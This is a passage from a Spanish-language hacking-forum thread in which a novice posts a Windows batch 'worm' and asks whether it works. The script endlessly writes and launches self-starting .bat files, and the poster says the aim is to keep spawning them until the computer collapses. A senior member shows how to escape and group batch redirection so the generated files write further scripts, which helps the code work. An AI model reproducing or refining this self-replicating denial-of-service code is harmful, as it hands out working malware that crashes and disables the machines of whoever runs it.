elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [BATCH] Worm. ¿Funcionaria?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: [BATCH] Worm. ¿Funcionaria?  (Leído 6,504 veces)
Ori-chan

Desconectado Desconectado

Mensajes: 257


El rey de los novatos en persona.


Ver Perfil
[BATCH] Worm. ¿Funcionaria?
« en: 22 Diciembre 2012, 16:52 pm »

El código es este:

Código
  1. @echo off
  2. title VM
  3. color 02
  4. :go
  5. set U=%random%%random%%random%%random%%random%%random%%random%%random%%random%
  6. echo @echo off>>%U%.bat
  7. echo set T=%random%%random%%random%%random%%random%%random%%random%%random%%random%>>%U%.bat
  8. echo :go>>%U%.bat
  9. echo @echo off>>%U%>>%T%.bat
  10. echo start>>%U%.bat
  11. echo goto go>>%U%.bat
  12. start %U%.bat
  13. goto go


Como entenderéis no lo voy a probar. Pero me gustaría saber si podría funcionar.
Especialmente me gustaria saber si se pueden hacer cosas como esta:
Código
  1. echo echo echo hola>>x.bat>>y.bat

(Entonces podría hacer el worm mas complicado)


PD: No pretendo hacer nada malo con esto.



:D<(Un saludo y gracias por leer!!)


En línea


OmarHack


Desconectado Desconectado

Mensajes: 1.268


Ver Perfil
Re: [BATCH] Worm. ¿Funcionaria?
« Respuesta #1 en: 22 Diciembre 2012, 17:09 pm »

Por la pinta parece que sí, si lo pruebas en una maquina virtual no lo podrias comprobar? Suerte :)


En línea

I like to test things.
Ori-chan

Desconectado Desconectado

Mensajes: 257


El rey de los novatos en persona.


Ver Perfil
Re: [BATCH] Worm. ¿Funcionaria?
« Respuesta #2 en: 22 Diciembre 2012, 17:13 pm »

Si lo tengo que correr en mi ordenador espero que no funcione xD
En línea


OmarHack


Desconectado Desconectado

Mensajes: 1.268


Ver Perfil
Re: [BATCH] Worm. ¿Funcionaria?
« Respuesta #3 en: 22 Diciembre 2012, 17:18 pm »

JAJAJA sería una autentica pu**da jaja.
Prueba esta http://vmware-workstation.softonic.com/ "Con VMware Workstation podrás recrear las características técnicas de un ordenador e instalar un sistema operativo. Cualquier problema que tenga se quedará ahí, sin afectar tu PC físicamente"  :)
En línea

I like to test things.
Ori-chan

Desconectado Desconectado

Mensajes: 257


El rey de los novatos en persona.


Ver Perfil
Re: [BATCH] Worm. ¿Funcionaria?
« Respuesta #4 en: 22 Diciembre 2012, 17:22 pm »

Jajaja! Muchas gracias. Ahora no puedo instalar nada. Este ordenador no es mio y tengo terminantemente prohibido instalar cosas o programar (si, vaya *****. Pero es lo que hay).

Saludos!! Da gusto hablar con gente como tu.
En línea


OmarHack


Desconectado Desconectado

Mensajes: 1.268


Ver Perfil
Re: [BATCH] Worm. ¿Funcionaria?
« Respuesta #5 en: 22 Diciembre 2012, 17:29 pm »

Gracias e igualmente  ;D
Se lo que es no poder instalar nada porque estuve una temporada atado a usar el pc de mi hermana, un día le instalé un emulador y casi me mata porque decía que le llenaba el ordenata de virus jajaja un día le instalé ubuntu junto a su windows me cambió el arranque del ordenador y casi me mata jajajajaja. Se niega a instalar un antivirus porque le molestan sus avisos cuando entra en páginas llenas de pop ups con sabe dios que.  :xD 
En línea

I like to test things.
Ori-chan

Desconectado Desconectado

Mensajes: 257


El rey de los novatos en persona.


Ver Perfil
Re: [BATCH] Worm. ¿Funcionaria?
« Respuesta #6 en: 22 Diciembre 2012, 17:43 pm »

LoooL!! Una vez le dejé el ordenador a mi hermana el ordenador y cuando lo dejó aparecieron 4 barras de busqueda mas... Y lo del antivirus es como tirarse en avión y no llevar paracaídas porque molesta.  :xD
(Si vamos a seguir hablando mejor por mensajes. Que esto ya se sale del tema, y después vienen los demás a quejarse).
En línea


Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.709



Ver Perfil
Re: [BATCH] Worm. ¿Funcionaria?
« Respuesta #7 en: 22 Diciembre 2012, 17:46 pm »

Código
  1. echo echo echo hola>>x.bat>>y.bat
Si lo que pretendes es que en contenido del archivo "y.bat" quede así:
Código:
echo echo hola >>x.bat

Entonces lo que tienes que hacer es escapar los caracteres especiales:
Código
  1. echo echo echo hola ^>^>x.bat >>y.bat

Y si tienes que escribir más de una línea lo correcto es hacer una agrupación:

Código
  1. (
  2. Echo (
  3. Echo echo comando1
  4. Echo echo comando2
  5. Echo echo hola
  6. Echo echo comando3
  7. Echo echo comando4
  8. Echo ^)^>^>x.bat
  9. )>y.bat

PD: Tienes muchos ejemplos de ese tipo en el script "Virulator" de mi firma.



Si lo que pretendes es enviar el output "Echo echo hola" a 2 archivos, no puedes hacerlo de forma nativa, pero puedes usar software de terceros, como por ejemplo "WinTEE" > http://wintee.googlecode.com/files/wtee.exe
Código
  1. Echo echo Hola|WinTEE "x.bat" "y.bat"



Y como te han dicho, lo puedes probar en una máquina virtual, de echo crear un código sin probarlo es puro lammerismo (Porfavor, no te sientas ofendido, solo es una opinion), aunque yo te recomiendo "VirtualBox" > http://download.virtualbox.org/virtualbox/4.2.6/VirtualBox-4.2.6-82870-Win.exe

Saludos
« Última modificación: 22 Diciembre 2012, 17:54 pm por EleKtro H@cker » En línea


z3nth10n


Desconectado Desconectado

Mensajes: 1.584


"Jack of all trades, master of none." - Zenthion


Ver Perfil WWW
Re: [BATCH] Worm. ¿Funcionaria?
« Respuesta #8 en: 22 Diciembre 2012, 17:50 pm »

Perdonad mi ignorancia y mi curiosidad, que se supone que hay cuando ejecutases el primer bat?  :laugh:
En línea


Interesados hablad por Discord.
Ori-chan

Desconectado Desconectado

Mensajes: 257


El rey de los novatos en persona.


Ver Perfil
Re: [BATCH] Worm. ¿Funcionaria?
« Respuesta #9 en: 22 Diciembre 2012, 17:58 pm »

Gracias, EleKtro H@cker.


Perdonad mi ignorancia y mi curiosidad, que se supone que hay cuando ejecutases el primer bat?  :laugh:

Pues cuando lo arregle gracias a EleKtro H@cker deberia crear archivos .bat que creen archivos .bat que se abran a si mismos, Todo eso repetidamente hasta que el ordenador se colapse.
En línea


Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
ayuda con un worm en batch
Scripting
krlos__gb 1 1,606 Último mensaje 26 Marzo 2008, 07:54 am
por leogtz
¿Me funcionaría el gta 4 con este pc? « 1 2 »
Juegos y Consolas
j.garcia2 16 5,305 Último mensaje 26 Diciembre 2008, 00:32 am
por j.garcia2
Juego Batch: Worm 6
Scripting
0x0309 4 3,862 Último mensaje 26 Marzo 2009, 23:41 pm
por 0x0309
[ANTENA USB] Esto funcionaria?
Materiales y equipos
Seritx 0 1,391 Último mensaje 2 Enero 2011, 16:14 pm
por Seritx
[BATCH] Virus raro. ¿Funcionaria?
Scripting
Ori-chan 8 2,699 Último mensaje 24 Diciembre 2012, 06:28 am
por Eleкtro
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines